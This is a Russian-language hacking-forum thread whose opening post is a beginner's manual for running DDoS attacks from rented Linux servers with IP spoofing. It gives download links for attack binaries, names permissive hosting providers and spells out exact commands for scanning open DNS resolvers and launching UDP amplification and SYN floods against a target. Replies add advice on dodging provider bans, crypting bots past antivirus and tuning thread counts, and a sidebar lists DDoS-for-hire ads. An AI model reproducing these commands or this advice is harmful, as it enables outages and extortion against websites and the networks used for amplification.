DDoS атаки с Linux серверов

Admin

Администратор
Автор статьи paran0id никаких побуждений к действию в ней не содержится. Все лишь в теории и для ознакомления!
Как сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!
Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:
- нет нормальных загрузок, продают в основном одно говно в сто рук
- нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки
- из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно
- средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.

Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса)
В основном это upd amplification и syn flood, который в nix благо может быть реализован.

В этом небольшом, так сказать, мануале, я покажу новичкам как проводить такие атаки.
- SSH клиент, для отдачи команд серверам. Рекомендую xshell
Скачать: http://www.netsarang.com/download/down_xsh.html
- FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее
- Утилитка для разделения txt файла на части. Я использовал split
Скачать: http://www.sendspace.com/file/4ai08a
- Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification (так же добавил ntp attack и ntp checker с аналогичным принципом использования) Скриты могу позже выложить побольше)
Скачать: https://mega.co.nz/#!6xl3SIaK!stJbF...x_nVoVzENC7LeEA
- Ну и конечно сами сервера. Например http://ecatel.co.uk/ любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.
Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh.
В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера.
Ну вот, предположим вы купили сервер. Коннектимся к нему через ssh клиент.
Сначала установим glibc необходимый для работы скриптов:
yum install glibc.i686 если centos
apt-get install glibc.i686 если debian


Далее заливаем udp, syn и scan на сервер через фтп клиент или
wget http://host.com/udp и тд.

Ставим на них права 777 в фтп клиенте или
chmod -R 777 syn

На этом пока все, теперь переходим к днс листам.

Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них.
Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за скан. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом.
На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей.
Пример использования:
./scan 1 99999 list.txt 3 admin.gull.ca 3800

Где:
1 - начало диапазона
99999 - конец диапазона
list.txt - файл куда будут сохранятся днски
3 - количество потоков, 3 как раз на гигабитный канал
admin.gull.ca - домен для скана с кучей А записей
3800 - размер ответа в байтах.

Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров:
http://dnsamplificationattacks.blogspot.com/
Проверяем их командой dig:
dig A admin.gull.ca

или
dig ANY admin.gull.ca

Если ответ 3800+ - смело сканим на этот домен.

И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей.
Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd:
split list.txt 3532804

И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части.
Теперь берем эти листы и распределяем по серверам.
Можете другой утилиткой это делать, главное принцип понятен.
Готово? Можно ддосить
smile.gif


Udp flood запускаем так:
./udp 121.2.2.10 80 list.txt 99 1000

80 - порт
list.txt - лист наш естественно
99 - количетсво потоков, больше 100 ставить не рекомендую
1000 - длительность атаки в секундах

Syn flood запускаем так:
./syn 121.2.2.10 21 100 -1 1000

21 - порт
100 - количество потоков, больше 100 тоже не стоит ставить
-1 - лимит pps, то есть -1 это без лимита
1000 - длительность атаки в секундах


Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться.
Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета.
Да, все делается ручками, это вам не штормбот
biggrin.gif
. Зато на халяву

Надеюсь информация эта будет кому нибудь полезна, если хоть один чел отсюда узнает что то для себя новое - значит я не зря все это писал
smile.gif
.
Если что то интересует, спрашивайте, дополню расскажу подскажу разжую помогу. Успехов, дедосеры
biggrin.gif



Вот несколько дц где еще можно купить сервера со спуфингом:
hxxp://www.servermania.com/
hxxp://www.us.unmetered.com/
hxxp://unit-is.com/


 
M

Movsarr

Ух ты! Ух ты! Syn флуд...Можно свободно ддосить компьютеры))) попробую...
Сегодня зарегистрировал vds скорость была 200 мбит+ подумал..Можно же ддосить с помощью LOIC как только скачал и запустил эту прогу..vds сразу выключился и потом сразу на почту пришло письмо о том что его заблокировали))вот так вот,не знаешь как это можно обойти?
 

Admin

Администратор
Ух ты! Ух ты! Syn флуд...Можно свободно ддосить компьютеры))) попробую...
Сегодня зарегистрировал vds скорость была 200 мбит+ подумал..Можно же ддосить с помощью LOIC как только скачал и запустил эту прогу..vds сразу выключился и потом сразу на почту пришло письмо о том что его заблокировали))вот так вот,не знаешь как это можно обойти?
Конечно заблочат, нужно брать сервера офшорные и знать где разрешен исходящий трафик в хороших количествах.
 
Я только включил программу (запустил exe'шник) как они узнали?
явно есть мониторинг каких-то определенных exe"шников, тем более такой софт популярный как LOIC. Поставил бы что менее популярное,забанили бы не так быстро))
 
M

Movsarr

явно есть мониторинг каких-то определенных exe"шников, тем более такой софт популярный как LOIC. Поставил бы что менее популярное,забанили бы не так быстро))
Возможно,или loic отправляет какой то пакет при запуске,вот его наверно и читают.
 
S

Secruity(ушел в подполье)

может там многопоточный софт запрещен,не?
 
K

Krabeg

Я как селлер по ддосу, уже почти 10 лет, случайно заглянул в эту тему, и просто не мог не ответить. Извини админ за прямоту.
Admin сказал(а):
Как сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!
Ну что тут сказать, твой друг даун, это же очевидно. Если он не знает тонкости L7-атак хотя бы, то тут и говорить нечего, такие как он, имея на борту даже онлайн 10к ботов, нихера не сделает ))
Admin сказал(а):
Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:
Что-что? Многочисленных ботнетов? ))) Смешно блин, пиздец просто. Может ты хотел сказать ботов, а не ботнетов?
Admin сказал(а):
- нет нормальных загрузок, продают в основном одно говно в сто рук
Есть нормальные загрузки, но разумеется не то, что раньше, и продают не в 100 рук, а в 1.000 рук. Сейчас одни Win10, там везде WinDefender стоит, поэтому без хорошего крипта толку не будет.
Admin сказал(а):
- нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки
Это да, но можно заказать приватный софт, разумеется это будет стоить денег. Я в своё время заказал у автора дирта приватную версию, Dirt Jumper v6 (бот имеет дополнительные атаки, такие как UDP, где можно задавать количество мбит исходящего трафика, и прочее, также бот имеет множество плюсов, таких как перезапуск при закрытии из диспетчера задач, размер бота намного ниже, и много чего другого)
Admin сказал(а):
- из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно
Ну они не просто так же мрут, крипт если ты покупаешь у всяких школотушников, то ясное дело толку с него не будет, через 2-3 часа пропалится, на след день уже сильно палиться будет, нечего покупать гавно, проще самому что-то разработать, иначе результата не будет. А тратить деньги на всякие гавно-крипты это полный бред, еще и этих пидоров кормить, даже не думай, пусть с голоду здохнут.
Admin сказал(а):
- средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.
Охх... вообще-то, все аппаратки как раз отлично фильтруют весь трафик, кроме L7. По сути, лично мне отбить ботов не проблема, я могу пофильтровать хоть 50к ботов на дохленькой VPS, средствами ПО (без перебана), однако, большинство сервисов и хостеров это не делают, в большинстве случаев там бывает мутят тупо перебан ботов, который бывает можно легко обойти, если имеется опыт.
Admin сказал(а):
Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса)
В основном это upd amplification и syn flood, который в nix благо может быть реализован.
Ой... это не ддосеры, а членососсеры, по другому никак их назвать нельзя. Ну скажем так, лить тонны трафа можно и без спуфа, и потом, сейчас ампла не актуальна, ввиду того, что всё дельное давно пофиксили, и никакие норм атаки ты не сделаешь. В любом случае, арбор и прочие современные аппаратки, которых сейчас просто валом, с легкостью фильтруют все спуф-атаки, любые канальные и любые силовые (то есть на pps).
Admin сказал(а):
- Ну и конечно сами сервера. Например http://ecatel.co.uk/ любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.
Это старая статья, на екателе спуф давно прикрыли, актуально было 2013-2014 года, сейчас там ты просто подаришь им бабки, и ничего не сможешь полить с серверов, в добавок они еще нахер пошлют и постебутся...
Admin сказал(а):
100 - количество потоков, больше 100 тоже не стоит ставить
Блин, тот еблан, что писал эту статью, это был придурок из Азербайджана, я его хорошо знал, так вот, какие в пизду 100 потоков, лучше 1.000 бы сразу писал =) Там скока ядер на проце, стока и потоков нужно ставить, иначе получится полное гавно, а не атака. Проц просто будет захлебываться и не будет выжимать максимальную выдачу ппс. Блин, ну вот дауны есть дауны, дауны на то и дауны...
Admin сказал(а):
(А как достичь 100-200 гбит?)
Сканишь много листов днс, берешь мощные сервера и на выхлопе получаешь около 100 гбит udp/syn флуда.
Какие епт 100 гбит ))) Имея свежие листы и канал сервера 1 гбит, ты даже 2 гбит не выжмешь, смешно... меня забавляют такие байки про 50-100-200 Гбит с DNS амплификации, блядь, вы ебать хоть раз-то тестили что там выжимает? Прежде чем упорото писать что-то, хоть бы раз в жизни взяли бы и протестили. Ага, что, еще и SYN 100 Гбит выжимает? )) Какие епт 100 Гбит, откуда??? Если у тебя канал 1 гбит, с него максимум 1,47 лям ппс максимум, по трафу уже зависит от размера пакета отправляемого, но причем тут вообще мбит/гбит, если это атака на ппс... Блин, все только и могут нести одну чушь про 100-500 Гбит, супер мощь, но это детский сад для школоты, все эти сказки... На деле всё совсем не так, и по сути, тупой школоте это знать и не нужно.
 
Похожие темы
Admin Статья Инструкция Layer4 DDOS атаки. Уязвимости и взлом 0
Admin Интересно У Китая всё по плану: сначала военные учения, следом – DDoS-атаки. Новости в сети 0
Support81 Ковровые бомбардировки в сети: DDoS-атаки выросли на 268% Новости в сети 0
S DDoS-атаки в четвертом квартале 2019 года Новости в сети 0
A Интересно (РЕКОМЕНДУЮ) Заказ DDOS атаки - Услуги по устранению конкуренции. Ищу работу. Предлагаю свои услуги. 3
E Мощнейший спам звонками и SMS + любой вид DDoS-атаки Termux Раздачи и сливы 1
G Как выполняют DDOS атаки? Готовый софт 9
S Как делать DDos/Dos атаки через VDS сервер Готовый софт 0
Admin Усиливаем ddos атаки с помощью уязвимости в Memcached Полезные статьи 0
Admin Строим ханипот и выявляем DDoS-атаки Готовый софт 0
Admin Статья DDoS на Bluetooth. Разбираем трюк, который поможет отключить чужую колонку Полезные статьи 0
Admin Статья Энциклопедия DDOS Вирусология 0
Support81 15.72 Тбит/c, 3.64 млрд пакетов и 500 000 заражённых устройств. Ваш домашний роутер мог участвовать в крупнейшей DDoS-атаке в истории Новости в сети 0
Support81 Европол пресек деятельность пророссийской группы хакеров NoName057(16) DDoS Новости в сети 0
whiteside ОРГАНИЗУЮ DDOS АТАКУ НА САЙ ТВОЕГО КОНКУРЕНТА Спам: софт, базы, рассылки, отклики, ddos 0
Support81 DDoS на заказ: как Matrix монетизирует крупнейшую ботнет-сеть через Telegram Новости в сети 0
Support81 Операция PowerOFF: раскрыта крупнейшая сеть координации DDoS-атак Новости в сети 0
Support81 Бесконечный DDoS: CUPS превращает принтеры в невольных соучастников кибератак Новости в сети 0
Support81 Ботнет в каждом доме: хакеры снова порабощают роутеры TP-Link для DDoS-атак Новости в сети 0
Emilio_Gaviriya Статья Как работает Анти-DDoS. Уязвимости и взлом 0
M Ожидает оплаты DDoS - attacks Ищу работу. Предлагаю свои услуги. 1
Support81 Победителей не будет: авторы Tor вступают в неравный бой с DDoS-атаками Новости в сети 0
Support81 CISA заявило о DDoS-атаках: хакеры хотят дестабилизировать ситуацию в мире Новости в сети 0
N ✅ (РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS ✅ Ищу работу. Предлагаю свои услуги. 2
Shainy На проверке Shainy DDoS Service / Заказать DDOS услуги по приятной цене.Купить DDOS атаку.DDOS Услуги. / 24/7 / Гарант. Ищу работу. Предлагаю свои услуги. 1
D нужна услуга по атаку спам флуд DDos по адекватной ценеб плочу BTC Свободное общение 1
C Layer 4 DDOS Tool Python Спам: софт, базы, рассылки, отклики, ddos 0
X ИЩЕМ ЛУЧШИЙ В МИРЕ СЕРВИС ПО ПРЕДОСТАВЛЕНИЮ ЗАЩИТЫ В КЛИРНЕТ И ONION ОТ ЛЮБЫХ DDOS АТАК! Предоставляю работу. Ищу специалиста. 1
G Интересно Самый бюджетный DDoS сервис Уязвимости и взлом 1
A Интересно CasT-Security.ru Приватная защита от DDoS-атак Ищу работу. Предлагаю свои услуги. 0
G ✅Recommend✅ Innovative Technologies off Ddos Service. Ищу работу. Предлагаю свои услуги. 1
Antonka_1000 У кого нибудь прога для DDOS'а серверов CS1.6???? Свободное общение 4
turbion0 DDOS от ↯Turbion Service↯ Спам: софт, базы, рассылки, отклики, ddos 4
D [Service]MASSIVE DDOS/ Мгновенное тестирование вашего ресурса. Ищу работу. Предлагаю свои услуги. 8
S Service DDOS Attack/ДДОС Атака на заказ. Профессионалы к вашим услугам. Спам: софт, базы, рассылки, отклики, ddos 2
J Предлагаю вам качественные услуги DDoS Attack Спам: софт, базы, рассылки, отклики, ddos 1
G Аренда DDOS мощностей с помесячной оплатой,хватит переплачивать псевдо ддосерам.(V 1.0) Спам: софт, базы, рассылки, отклики, ddos 2
jsbypass >>> DDOS-SERVICE <<< | ЗАКАЗАТЬ ДДОС | ДДОС НА ЗАКАЗ Ищу работу. Предлагаю свои услуги. 2
D DDoS SerVice #1(Устраняем ваших конкурентов) Ищу работу. Предлагаю свои услуги. 0
D Положим (сделаем недоступным) сайт! Ddos-сервис к вашим услугам! Проведём мощную ддос-атаку, устраним конкурентов легко и быстро! Спам: софт, базы, рассылки, отклики, ddos 1
NickelBlack DDOS SYN Flood Готовый софт 3
S Как защитить сайт от DDos Атак? Свободное общение 2
Denik Интересно Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты Уязвимости и взлом 1
N Предоставляю услуги по устранению сайтов и серверов с помощью DDOS атак.Наш сервис поможет решить ваши проблемы с конкурентами. Спам: софт, базы, рассылки, отклики, ddos 0
NickelBlack BlackNET Botnet v3.5 [Stealer+Keylogger+DDOS] Программирование 24
L Интересно Участник «Сколково» защитит МТ5-брокеров от DDoS-атак Новости в сети 0
D Обучение DDos Свободное общение 0
Denik Интересно DDOS сайта при использовании WordPress Уязвимости и взлом 1
L Интересно Домены биржи Binance подверглись DDoS-атаке Новости в сети 0
АнАлЬнАя ЧуПаКаБрА INLINE ddos сайта Готовый софт 5

Название темы